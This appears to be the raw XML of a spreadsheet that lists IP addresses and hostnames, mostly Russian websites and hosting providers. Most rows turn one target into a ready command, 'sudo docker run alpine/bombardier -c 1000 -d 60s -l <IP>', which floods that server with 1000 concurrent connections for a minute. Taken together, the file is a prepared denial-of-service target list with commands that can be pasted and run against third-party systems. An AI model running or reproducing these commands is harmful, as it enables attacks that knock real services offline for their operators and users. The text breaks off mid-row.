    <t>35.172.0.156</t>
  </si>
  <si>
    <t>34.216.253.167</t>
  </si>
  <si>
    <t>34.205.242.146</t>
  </si>
  <si>
    <t>3.18.7.81</t>
  </si>
  <si>
    <t>217.13.220.131</t>
  </si>
  <si>
    <t>kmv.ru</t>
  </si>
  <si>
    <t>213.189.196.191</t>
  </si>
  <si>
    <t>211.18.223.250</t>
  </si>
  <si>
    <t>aif.net</t>
  </si>
  <si>
    <t>195.2.72.190</t>
  </si>
  <si>
    <t>host.ru</t>
  </si>
  <si>
    <t>194.87.50.41</t>
  </si>
  <si>
    <t>ve.dol.ru</t>
  </si>
  <si>
    <t>194.58.112.173</t>
  </si>
  <si>
    <t>186.2.163.44</t>
  </si>
  <si>
    <t>185.71.67.28</t>
  </si>
  <si>
    <t>178.208.83.27</t>
  </si>
  <si>
    <t>mchost.ru</t>
  </si>
  <si>
    <t>176.57.210.39</t>
  </si>
  <si>
    <t>e-epr.ru</t>
  </si>
  <si>
    <t>168.119.0.154</t>
  </si>
  <si>
    <t>reserver.ru</t>
  </si>
  <si>
    <t>156.67.72.149</t>
  </si>
  <si>
    <t>134.0.112.29</t>
  </si>
  <si>
    <t>121.199.48.185</t>
  </si>
  <si>
    <t>95.131.27.119</t>
  </si>
  <si>
    <t>95.129.210.115</t>
  </si>
  <si>
    <t>hk-net.de</t>
  </si>
  <si>
    <t>94.198.52.42</t>
  </si>
  <si>
    <t>94.198.52.41</t>
  </si>
  <si>
    <t>94.198.52.40</t>
  </si>
  <si>
    <t>93.191.13.245</t>
  </si>
  <si>
    <t>fiord.ru</t>
  </si>
  <si>
    <t>93.191.8.24</t>
  </si>
  <si>
    <t>92.62.113.232</t>
  </si>
  <si>
    <t>91.230.208.103</t>
  </si>
  <si>
    <t>90.156.201.114</t>
  </si>
  <si>
    <t>87.236.16.13</t>
  </si>
  <si>
    <t>82.112.49.142</t>
  </si>
  <si>
    <t>k-telecom.org</t>
  </si>
  <si>
    <t>81.173.194.3</t>
  </si>
  <si>
    <t>netcologne.de</t>
  </si>
  <si>
    <t>81.23.15.118</t>
  </si>
  <si>
    <t>aif.ru</t>
  </si>
  <si>
    <t>81.23.15.117</t>
  </si>
  <si>
    <t>81.23.15.90</t>
  </si>
  <si>
    <t>81.23.15.88</t>
  </si>
  <si>
    <t>misp.ru</t>
  </si>
  <si>
    <t>81.23.15.72</t>
  </si>
  <si>
    <t>81.23.15.68</t>
  </si>
  <si>
    <t>81.5.72.48</t>
  </si>
  <si>
    <t>mipt.ru</t>
  </si>
  <si>
    <t>80.78.247.56</t>
  </si>
  <si>
    <t>50.240.2.26</t>
  </si>
  <si>
    <t>comcastbusiness.net</t>
  </si>
  <si>
    <t>46.4.15.241</t>
  </si>
  <si>
    <t>0xx.ru</t>
  </si>
  <si>
    <t>37.140.192.180</t>
  </si>
  <si>
    <t>37.140.192.151</t>
  </si>
  <si>
    <t>35.209.94.229</t>
  </si>
  <si>
    <t>23.20.163.89</t>
  </si>
  <si>
    <t>5.189.157.232</t>
  </si>
  <si>
    <t>gdb.ru</t>
  </si>
  <si>
    <t>5.188.138.222</t>
  </si>
  <si>
    <t>empresariar490.cloud</t>
  </si>
  <si>
    <t>5.101.153.78</t>
  </si>
  <si>
    <t>217.173.75.18</t>
  </si>
  <si>
    <t>rgg.ru</t>
  </si>
  <si>
    <t>217.112.42.80</t>
  </si>
  <si>
    <t>valuehost.ru</t>
  </si>
  <si>
    <t>213.135.81.50</t>
  </si>
  <si>
    <t>195.42.161.200</t>
  </si>
  <si>
    <t>dataforce.net</t>
  </si>
  <si>
    <t>195.24.68.29</t>
  </si>
  <si>
    <t>194.190.176.203</t>
  </si>
  <si>
    <t>194.190.176.202</t>
  </si>
  <si>
    <t>194.190.176.201</t>
  </si>
  <si>
    <t>194.190.37.235</t>
  </si>
  <si>
    <t>rg.ru</t>
  </si>
  <si>
    <t>194.190.37.234</t>
  </si>
  <si>
    <t>194.190.37.233</t>
  </si>
  <si>
    <t>194.190.37.229</t>
  </si>
  <si>
    <t>194.190.37.227</t>
  </si>
  <si>
    <t>194.190.37.226</t>
  </si>
  <si>
    <t>194.190.37.15</t>
  </si>
  <si>
    <t>194.190.23.72</t>
  </si>
  <si>
    <t>194.190.23.70</t>
  </si>
  <si>
    <t>194.190.23.69</t>
  </si>
  <si>
    <t>194.190.23.68</t>
  </si>
  <si>
    <t>194.190.23.66</t>
  </si>
  <si>
    <t>194.190.23.62</t>
  </si>
  <si>
    <t>194.190.23.61</t>
  </si>
  <si>
    <t>194.190.23.36</t>
  </si>
  <si>
    <t>194.190.23.33</t>
  </si>
  <si>
    <t>194.190.23.32</t>
  </si>
  <si>
    <t>194.190.23.31</t>
  </si>
  <si>
    <t>194.190.23.30</t>
  </si>
  <si>
    <t>194.190.23.28</t>
  </si>
  <si>
    <t>194.190.23.27</t>
  </si>
  <si>
    <t>194.190.23.26</t>
  </si>
  <si>
    <t>194.190.23.25</t>
  </si>
  <si>
    <t>194.190.23.24</t>
  </si>
  <si>
    <t>194.190.23.23</t>
  </si>
  <si>
    <t>194.190.20.120</t>
  </si>
  <si>
    <t>rgs.ru</t>
  </si>
  <si>
    <t>194.87.111.121</t>
  </si>
  <si>
    <t>ruvds.com</t>
  </si>
  <si>
    <t>188.186.157.53</t>
  </si>
  <si>
    <t>ertelecom.ru</t>
  </si>
  <si>
    <t>185.199.108.153</t>
  </si>
  <si>
    <t>github.com</t>
  </si>
  <si>
    <t>178.210.92.160</t>
  </si>
  <si>
    <t>176.9.19.43</t>
  </si>
  <si>
    <t>147.28.0.41</t>
  </si>
  <si>
    <t>rg.net</t>
  </si>
  <si>
    <t>145.239.18.80</t>
  </si>
  <si>
    <t>ip-145-239-18.eu</t>
  </si>
  <si>
    <t>104.21.234.198</t>
  </si>
  <si>
    <t>104.21.32.161</t>
  </si>
  <si>
    <t>104.21.16.218</t>
  </si>
  <si>
    <t>95.216.182.216</t>
  </si>
  <si>
    <t>gate-host.ru</t>
  </si>
  <si>
    <t>94.247.17.8</t>
  </si>
  <si>
    <t>94.23.63.228</t>
  </si>
  <si>
    <t>tsrus.cn</t>
  </si>
  <si>
    <t>92.53.96.180</t>
  </si>
  <si>
    <t>91.218.229.13</t>
  </si>
  <si>
    <t>91.201.52.66</t>
  </si>
  <si>
    <t>90.156.201.123</t>
  </si>
  <si>
    <t>90.156.201.102</t>
  </si>
  <si>
    <t>89.108.87.44</t>
  </si>
  <si>
    <t>rgo.ru</t>
  </si>
  <si>
    <t>87.226.162.216</t>
  </si>
  <si>
    <t>85.25.34.178</t>
  </si>
  <si>
    <t>serverprofi24.net</t>
  </si>
  <si>
    <t>84.200.239.254</t>
  </si>
  <si>
    <t>84.52.112.74</t>
  </si>
  <si>
    <t>westcall.net</t>
  </si>
  <si>
    <t>81.26.145.152</t>
  </si>
  <si>
    <t>81.26.145.150</t>
  </si>
  <si>
    <t>81.26.145.147</t>
  </si>
  <si>
    <t>81.26.145.131</t>
  </si>
  <si>
    <t>67.227.229.188</t>
  </si>
  <si>
    <t>aspotigo.com</t>
  </si>
  <si>
    <t>67.199.248.12</t>
  </si>
  <si>
    <t>bitly.com</t>
  </si>
  <si>
    <t>62.76.27.180</t>
  </si>
  <si>
    <t>45.130.41.27</t>
  </si>
  <si>
    <t>37.140.192.229</t>
  </si>
  <si>
    <t>31.41.192.74</t>
  </si>
  <si>
    <t>nsplus.ru</t>
  </si>
  <si>
    <t>31.31.198.180</t>
  </si>
  <si>
    <t>5.61.42.92</t>
  </si>
  <si>
    <t>195.208.1.104</t>
  </si>
  <si>
    <t>188.64.160.163</t>
  </si>
  <si>
    <t>tsargrad.tv</t>
  </si>
  <si>
    <t>185.53.177.54</t>
  </si>
  <si>
    <t>107.163.252.216</t>
  </si>
  <si>
    <t>84.201.189.90</t>
  </si>
  <si>
    <t>77.238.100.200</t>
  </si>
  <si>
    <t>cirex.ru</t>
  </si>
  <si>
    <t>77.238.100.195</t>
  </si>
  <si>
    <t>77.238.100.194</t>
  </si>
  <si>
    <t>75.2.115.196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</si>
</sst>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00000000-0005-0000-0000-000000000000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C563"/>
  <sheetViews>
    <sheetView tabSelected="1" workbookViewId="0">
      <selection activeCell="A2" sqref="A2"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="11.25" defaultRowHeight="15.75" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="76.875" customWidth="1"/>
    <col min="2" max="2" width="14.75" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="45.25" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="2" spans="1:3" ht="15" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A2" s="1" t="s">
        <v>0</v>
      </c>
    </row>
    <row r="3" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A3" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B3&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 217.70.184.55&amp;&amp; sleep 5;</v>
      </c>
      <c r="B3" s="1" t="s">
        <v>264</v>
      </c>
      <c r="C3" s="1" t="s">
        <v>265</v>
      </c>
    </row>
    <row r="4" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A4" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B4&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.239.205.43&amp;&amp; sleep 5;</v>
      </c>
      <c r="B4" s="1" t="s">
        <v>266</v>
      </c>
      <c r="C4" s="1" t="s">
        <v>267</v>
      </c>
    </row>
    <row r="5" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A5" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B5&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 199.59.243.200&amp;&amp; sleep 5;</v>
      </c>
      <c r="B5" s="1" t="s">
        <v>268</v>
      </c>
      <c r="C5" s="1" t="s">
        <v>268</v>
      </c>
    </row>
    <row r="6" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A6" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B6&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.20.49.142&amp;&amp; sleep 5;</v>
      </c>
      <c r="B6" s="1" t="s">
        <v>269</v>
      </c>
      <c r="C6" s="1" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="7" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A7" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B7&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.20.49.125&amp;&amp; sleep 5;</v>
      </c>
      <c r="B7" s="1" t="s">
        <v>270</v>
      </c>
      <c r="C7" s="1" t="s">
        <v>270</v>
      </c>
    </row>
    <row r="8" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A8" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B8&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 194.67.71.174&amp;&amp; sleep 5;</v>
      </c>
      <c r="B8" s="1" t="s">
        <v>271</v>
      </c>
      <c r="C8" s="1" t="s">
        <v>271</v>
      </c>
    </row>
    <row r="9" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A9" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B9&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 194.67.71.68&amp;&amp; sleep 5;</v>
      </c>
      <c r="B9" s="1" t="s">
        <v>272</v>
      </c>
      <c r="C9" s="1" t="s">
        <v>272</v>
      </c>
    </row>
    <row r="10" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A10" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B10&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 188.225.34.84&amp;&amp; sleep 5;</v>
      </c>
      <c r="B10" s="1" t="s">
        <v>273</v>
      </c>
      <c r="C10" s="1" t="s">
        <v>273</v>
      </c>
    </row>
    <row r="11" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A11" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B11&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 173.255.194.134&amp;&amp; sleep 5;</v>
      </c>
      <c r="B11" s="1" t="s">
        <v>274</v>
      </c>
      <c r="C11" s="1" t="s">
        <v>275</v>
      </c>
    </row>
    <row r="12" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A12" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B12&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 170.33.9.230&amp;&amp; sleep 5;</v>
      </c>
      <c r="B12" s="1" t="s">
        <v>183</v>
      </c>
      <c r="C12" s="1" t="s">
        <v>183</v>
      </c>
    </row>
    <row r="13" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A13" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B13&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 141.8.195.33&amp;&amp; sleep 5;</v>
      </c>
      <c r="B13" s="1" t="s">
        <v>276</v>
      </c>
      <c r="C13" s="1" t="s">
        <v>134</v>
      </c>
    </row>
    <row r="14" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A14" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B14&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 109.70.26.37&amp;&amp; sleep 5;</v>
      </c>
      <c r="B14" s="1" t="s">
        <v>6</v>
      </c>
      <c r="C14" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="15" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A15" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B15&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 99.83.248.67&amp;&amp; sleep 5;</v>
      </c>
      <c r="B15" s="1" t="s">
        <v>277</v>
      </c>
      <c r="C15" s="1" t="s">
        <v>24</v>
      </c>
    </row>
    <row r="16" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A16" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B16&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 95.173.136.161&amp;&amp; sleep 5;</v>
      </c>
      <c r="B16" s="1" t="s">
        <v>278</v>
      </c>
      <c r="C16" s="1" t="s">
        <v>278</v>
      </c>
    </row>
    <row r="17" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A17" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B17&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 95.173.136.82&amp;&amp; sleep 5;</v>
      </c>
      <c r="B17" s="1" t="s">
        <v>279</v>
      </c>
      <c r="C17" s="1" t="s">
        <v>279</v>
      </c>
    </row>
    <row r="18" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A18" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B18&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 95.173.136.80&amp;&amp; sleep 5;</v>
      </c>
      <c r="B18" s="1" t="s">
        <v>280</v>
      </c>
      <c r="C18" s="1" t="s">
        <v>280</v>
      </c>
    </row>
    <row r="19" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A19" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B19&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 95.173.136.79&amp;&amp; sleep 5;</v>
      </c>
      <c r="B19" s="1" t="s">
        <v>281</v>
      </c>
      <c r="C19" s="1" t="s">
        <v>281</v>
      </c>
    </row>
    <row r="20" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A20" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B20&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 95.173.136.77&amp;&amp; sleep 5;</v>
      </c>
      <c r="B20" s="1" t="s">
        <v>282</v>
      </c>
      <c r="C20" s="1" t="s">
        <v>282</v>
      </c>
    </row>
    <row r="21" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A21" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B21&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 95.173.136.72&amp;&amp; sleep 5;</v>
      </c>
      <c r="B21" s="1" t="s">
        <v>283</v>
      </c>
      <c r="C21" s="1" t="s">
        <v>283</v>
      </c>
    </row>
    <row r="22" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A22" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B22&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 95.173.136.70&amp;&amp; sleep 5;</v>
      </c>
      <c r="B22" s="1" t="s">
        <v>284</v>
      </c>
      <c r="C22" s="1" t="s">
        <v>284</v>
      </c>
    </row>
    <row r="23" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A23" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B23&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 92.51.149.198&amp;&amp; sleep 5;</v>
      </c>
      <c r="B23" s="1" t="s">
        <v>285</v>
      </c>
      <c r="C23" s="1" t="s">
        <v>286</v>
      </c>
    </row>
    <row r="24" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A24" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B24&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.236.136.120&amp;&amp; sleep 5;</v>
      </c>
      <c r="B24" s="1" t="s">
        <v>287</v>
      </c>
      <c r="C24" s="1" t="s">
        <v>288</v>
      </c>
    </row>
    <row r="25" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A25" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B25&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.194.2.84&amp;&amp; sleep 5;</v>
      </c>
      <c r="B25" s="1" t="s">
        <v>289</v>
      </c>
      <c r="C25" s="1" t="s">
        <v>289</v>
      </c>
    </row>
    <row r="26" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A26" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B26&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 81.177.141.71&amp;&amp; sleep 5;</v>
      </c>
      <c r="B26" s="1" t="s">
        <v>290</v>
      </c>
      <c r="C26" s="1" t="s">
        <v>291</v>
      </c>
    </row>
    <row r="27" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A27" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B27&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 81.177.140.212&amp;&amp; sleep 5;</v>
      </c>
      <c r="B27" s="1" t="s">
        <v>292</v>
      </c>
      <c r="C27" s="1" t="s">
        <v>291</v>
      </c>
    </row>
    <row r="28" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A28" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B28&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 80.87.192.95&amp;&amp; sleep 5;</v>
      </c>
      <c r="B28" s="1" t="s">
        <v>293</v>
      </c>
      <c r="C28" s="1" t="s">
        <v>294</v>
      </c>
    </row>
    <row r="29" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A29" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B29&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 75.2.111.214&amp;&amp; sleep 5;</v>
      </c>
      <c r="B29" s="1" t="s">
        <v>20</v>
      </c>
      <c r="C29" s="1" t="s">
        <v>24</v>
      </c>
    </row>
    <row r="30" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A30" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B30&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 66.81.199.56&amp;&amp; sleep 5;</v>
      </c>
      <c r="B30" s="1" t="s">
        <v>210</v>
      </c>
      <c r="C30" s="1" t="s">
        <v>210</v>
      </c>
    </row>
    <row r="31" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A31" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B31&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 62.233.121.5&amp;&amp; sleep 5;</v>
      </c>
      <c r="B31" s="1" t="s">
        <v>295</v>
      </c>
      <c r="C31" s="1" t="s">
        <v>296</v>
      </c>
    </row>
    <row r="32" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A32" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B32&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 62.122.170.171&amp;&amp; sleep 5;</v>
      </c>
      <c r="B32" s="1" t="s">
        <v>2</v>
      </c>
      <c r="C32" s="1" t="s">
        <v>21</v>
      </c>
    </row>
    <row r="33" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A33" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B33&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 52.128.23.153&amp;&amp; sleep 5;</v>
      </c>
      <c r="B33" s="1" t="s">
        <v>43</v>
      </c>
      <c r="C33" s="1" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="34" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A34" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B34&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 52.50.65.32&amp;&amp; sleep 5;</v>
      </c>
      <c r="B34" s="1" t="s">
        <v>10</v>
      </c>
      <c r="C34" s="1" t="s">
        <v>11</v>
      </c>
    </row>
    <row r="35" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A35" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B35&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 45.156.25.244&amp;&amp; sleep 5;</v>
      </c>
      <c r="B35" s="1" t="s">
        <v>297</v>
      </c>
      <c r="C35" s="1" t="s">
        <v>297</v>
      </c>
    </row>
    <row r="36" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A36" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B36&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 34.102.136.180&amp;&amp; sleep 5;</v>
      </c>
      <c r="B36" s="1" t="s">
        <v>22</v>
      </c>
      <c r="C36" s="1" t="s">
        <v>23</v>
      </c>
    </row>
    <row r="37" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A37" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B37&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 31.31.205.163&amp;&amp; sleep 5;</v>
      </c>
      <c r="B37" s="1" t="s">
        <v>17</v>
      </c>
      <c r="C37" s="1" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="38" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A38" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B38&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 18.116.152.12&amp;&amp; sleep 5;</v>
      </c>
      <c r="B38" s="1" t="s">
        <v>298</v>
      </c>
      <c r="C38" s="1" t="s">
        <v>11</v>
      </c>
    </row>
    <row r="39" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A39" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B39&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 5.188.28.172&amp;&amp; sleep 5;</v>
      </c>
      <c r="B39" s="1" t="s">
        <v>299</v>
      </c>
      <c r="C39" s="1" t="s">
        <v>300</v>
      </c>
    </row>
    <row r="40" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A40" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B40&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 5.101.159.26&amp;&amp; sleep 5;</v>
      </c>
      <c r="B40" s="1" t="s">
        <v>178</v>
      </c>
      <c r="C40" s="1" t="s">
        <v>178</v>
      </c>
    </row>
    <row r="41" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A41" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B41&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 5.101.152.189&amp;&amp; sleep 5;</v>
      </c>
      <c r="B41" s="1" t="s">
        <v>301</v>
      </c>
      <c r="C41" s="1" t="s">
        <v>12</v>
      </c>
    </row>
    <row r="42" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A42" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B42&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 3.64.163.50&amp;&amp; sleep 5;</v>
      </c>
      <c r="B42" s="1" t="s">
        <v>302</v>
      </c>
      <c r="C42" s="1" t="s">
        <v>11</v>
      </c>
    </row>
    <row r="43" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A43" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B43&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 95.84.178.79&amp;&amp; sleep 5;</v>
      </c>
      <c r="B43" s="1" t="s">
        <v>303</v>
      </c>
      <c r="C43" s="1" t="s">
        <v>304</v>
      </c>
    </row>
    <row r="44" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A44" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B44&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 94.250.250.113&amp;&amp; sleep 5;</v>
      </c>
      <c r="B44" s="1" t="s">
        <v>305</v>
      </c>
      <c r="C44" s="1" t="s">
        <v>306</v>
      </c>
    </row>
    <row r="45" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A45" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B45&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.158.134.8&amp;&amp; sleep 5;</v>
      </c>
      <c r="B45" s="1" t="s">
        <v>307</v>
      </c>
      <c r="C45" s="1" t="s">
        <v>50</v>
      </c>
    </row>
    <row r="46" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A46" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B46&amp;"&amp;&amp; sleep 5;"</f>
